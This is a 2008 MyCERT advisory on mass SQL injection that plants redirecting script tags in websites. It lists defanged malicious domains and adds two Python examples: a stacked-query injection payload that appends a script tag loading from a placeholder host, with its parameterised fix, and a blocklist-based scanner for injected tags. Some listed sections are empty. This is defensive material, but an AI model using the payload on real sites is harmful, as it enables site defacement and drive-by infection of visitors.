MA-129.052008: MyCERT Special Alert - Mass SQL Injection Attacks
Original Issue Date: 16th May 2008

1.0 Introduction

MyCERT has been observing a large number of websites around the globe being targeted by a mass SQL injection attack. The attack modifies the content of affected websites to include code that redirects visitors to another server hosting malicious code and exploits. Those exploits then allow the attacker to gain control of the visitor's computer.

2.0 Technical Description

The mass SQL injection attacks seem to be increasing in number, and more domains are being injected and used as vectors for the attack. MyCERT believes that the attack exploits SQL injection vulnerabilities in web applications to inject malicious script into the page content. An example of the malicious script is as follows:
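How such an injection defaces stored page content, and the parameterised query that prevents it, as an added example. It is not part of the original advisory and is not the advisory's own sample of the injected script. It assumes a hypothetical CMS table pages(id, title, body, hits) in an in-memory SQLite database, a hit-counter handler that concatenates the request's page id into its SQL, and a database driver that runs stacked statements (SQLite's executescript() stands in for that); the injected tag points at a placeholder host, not one of the domains listed in this advisory.

```python
import sqlite3

# Placeholder host for the injected tag (an assumption; not one of the advisory's listed domains).
INJECTED_TAG = '<script src="http://malicious.example/x.js"></script>'

# Attacker-supplied value for the page id: terminates the intended UPDATE with ';'
# and appends the tag to the body of every stored page (the mass-defacement pattern).
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Hypothetical CMS content table in an in-memory SQLite database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages(
            id    INTEGER PRIMARY KEY,
            title TEXT,
            body  TEXT,
            hits  INTEGER NOT NULL DEFAULT 0
        );
        INSERT INTO pages(id, title, body) VALUES (1, 'Home',  '<p>Welcome</p>');
        INSERT INTO pages(id, title, body) VALUES (2, 'About', '<p>About us</p>');
        """
    )
    return conn


def vulnerable_hit_counter(conn, page_id):
    """VULNERABLE: the request's page id is pasted into the SQL text.
    executescript() stands in for a driver that runs stacked statements,
    so a ';' in the input starts a second, attacker-chosen statement."""
    conn.executescript("UPDATE pages SET hits = hits + 1 WHERE id = " + page_id + ";")


def hardened_hit_counter(conn, page_id):
    """Hardened: validate the type, then bind the value as a parameter.
    The SQL text is a constant, so the input is never parsed as SQL."""
    pid = int(page_id)  # ValueError for anything that is not an integer
    conn.execute("UPDATE pages SET hits = hits + 1 WHERE id = ?", (pid,))
    conn.commit()


def injected_rows(conn):
    """Number of pages whose body now carries the injected tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM pages WHERE instr(body, ?) > 0", (INJECTED_TAG,)
    ).fetchone()[0]


def hits(conn, page_id):
    """Hit count stored for one page."""
    return conn.execute("SELECT hits FROM pages WHERE id = ?", (page_id,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    vulnerable_hit_counter(db, PAYLOAD)
    print("vulnerable handler: pages defaced =", injected_rows(db))  # 2

    db = make_db()
    try:
        hardened_hit_counter(db, PAYLOAD)
    except ValueError as e:
        print("hardened handler rejected the payload:", e)
    print("hardened handler: pages defaced =", injected_rows(db))  # 0
```

One request through the vulnerable handler is enough to append the tag to every row, which is why a single injectable parameter anywhere on a site defaces the whole site. Parameter binding alone already defeats the payload (the driver compares the literal string against the integer column and matches nothing); the int() check is kept so that malformed input is rejected loudly and logged rather than silently ignored.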
The redirection on the malicious domain is done using iframes. For example, the index.htm on one of the malicious sites that we analysed contains three further iframes that redirect users to a RealPlayer exploit, an Internet Explorer VML bug exploit and a Visual Basic Script that forces the victim to download and install a trojan. Based on our assessment, we have so far detected very few Malaysian sites affected by this mass SQL injection attack. However, MyCERT encourages administrators to be vigilant and alert for this attack or attempts at exploitation.

Most of the servers hosting the malicious scripts and exploits use .CN domains and are located in various countries:

hxxp://www.wowgm1.cn
hxxp://www.killwow1.cn
hxxp://www.wowyeye.cn
hxxp://vb008.cn
hxxp://9i5t.cn
hxxp://bbs.jueduizuan.com
hxxp://computershello.cn
hxxp://winzipices.cn
hxxp://www.11910.net
hxxp://www.414151.com
hxxp://www.aspder.com
hxxp://www.bluell.cn
hxxp://www.direct84.com
hxxp://www.kisswow.com.cn
hxxp://www.nihaorr1.com
hxxp://www.nmidahena.com
hxxp://www.ririwow.cn
hxxp://www.wowgm2.cn
hxxp://yl18.net

MyCERT has communicated with the relevant parties to shut down the above domains.

3.0 Detection

Symptoms of compromise are as follows:

4.0 Removal

The malicious script, i.e. the injected script described in section 2.0, must be removed from the content of the website. However, merely removing the malicious script does not fix the vulnerability that allowed the SQL injection attack to be carried out in the first place.

5.0 Preventive Measures

The following preventive measures can be applied by administrators:

Web administrators may refer to MyCERT's "Guide on Fixing SQL Injection Vulnerabilities" to prevent this vulnerability from being exploited.
System administrators and ISPs may consider filtering incoming and outgoing traffic to the above domains.
Administrators are advised to patch or upgrade their web applications and relevant software to the latest version.
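A scanner for the detection (3.0) and clean-up (4.0) steps, as an added example that is not taken from the advisory: it finds <script> and <iframe> tags whose src points at one of the hosts listed in section 2.0 and strips them, leaving all other tags alone. The sample page is constructed. The tag matching is a regular-expression simplification that handles the usual injected form (an opening tag with a src attribute, optionally followed directly by its closing tag) and is not a full HTML parser.

```python
import re
from urllib.parse import urlparse

# Hostnames from the advisory's list (section 2.0); extend with further indicators as they emerge.
KNOWN_BAD_HOSTS = {
    "www.wowgm1.cn", "www.killwow1.cn", "www.wowyeye.cn", "vb008.cn", "9i5t.cn",
    "bbs.jueduizuan.com", "computershello.cn", "winzipices.cn", "www.11910.net",
    "www.414151.com", "www.aspder.com", "www.bluell.cn", "www.direct84.com",
    "www.kisswow.com.cn", "www.nihaorr1.com", "www.nmidahena.com", "www.ririwow.cn",
    "www.wowgm2.cn", "yl18.net",
}

# A <script> or <iframe> opening tag carrying a src attribute, plus its closing tag
# when that follows immediately. Tolerant of unquoted values and odd spacing,
# which injected tags often have.
TAG_RE = re.compile(
    r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)[\"']?[^>]*>"
    r"(?:\s*</\1\s*>)?",
    re.IGNORECASE,
)


def listed_host(url, blocklist=KNOWN_BAD_HOSTS):
    """Return the blocklist entry that url's host equals or is a subdomain of, else None."""
    try:
        host = urlparse(url.strip()).hostname
    except ValueError:
        return None
    if not host:
        return None  # relative URL: no host to judge
    for bad in blocklist:
        if host == bad or host.endswith("." + bad):
            return bad
    return None


def find_injected_tags(html, blocklist=KNOWN_BAD_HOSTS):
    """(tag, src, matched_host) for every script/iframe whose src points at a listed host."""
    findings = []
    for m in TAG_RE.finditer(html):
        bad = listed_host(m.group(2), blocklist)
        if bad:
            findings.append((m.group(1).lower(), m.group(2), bad))
    return findings


def strip_injected_tags(html, blocklist=KNOWN_BAD_HOSTS):
    """Remove those tags (the clean-up in section 4.0). Legitimate tags are left untouched."""
    return TAG_RE.sub(
        lambda m: "" if listed_host(m.group(2), blocklist) else m.group(0), html
    )


# Constructed sample, as a site's stored page body might look after the attack.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="/js/site.js"></script></head>
<body><h1>Products</h1><p>Hello</p>
<script src=http://www.nihaorr1.com/1.js></script>
<iframe src="http://9i5t.cn/index.htm" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, src, host in find_injected_tags(SAMPLE_PAGE):
        print(f"injected <{tag}> -> {src} (listed host: {host})")
    print(strip_injected_tags(SAMPLE_PAGE))
```

Run find_injected_tags over each text column of the site's database as well as over the rendered pages, since the SQL injection writes the tag into database content rather than into files on disk. Subdomain matching is deliberate: a src of //cdn.yl18.net/a.js is still the listed yl18.net. As section 4.0 says, stripping the tags does not close the hole; fix the application first, or the content will simply be re-injected.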
If your website has become a victim of this attack, please do not hesitate to report it to us for further assistance. MyCERT can be reached at:

Tel: 03-89926969
Fax: 03-89453442
Email: mycert [at] mycert.org.my or cyber999 [at] cybersecurity.org.my
Web: http://www.mycert.org.my/report_incidents/online_form.html
Hp: 019-2665850
SMS: 019-2813801

References

Feedback can be directed to MyCERT.

Produced on 16 May 2008 by MyCERT, CyberSecurity Malaysia, an agency under the Ministry of Science, Technology and Innovation (MOSTI).

Revision History:
Initial Release: 16 May 2008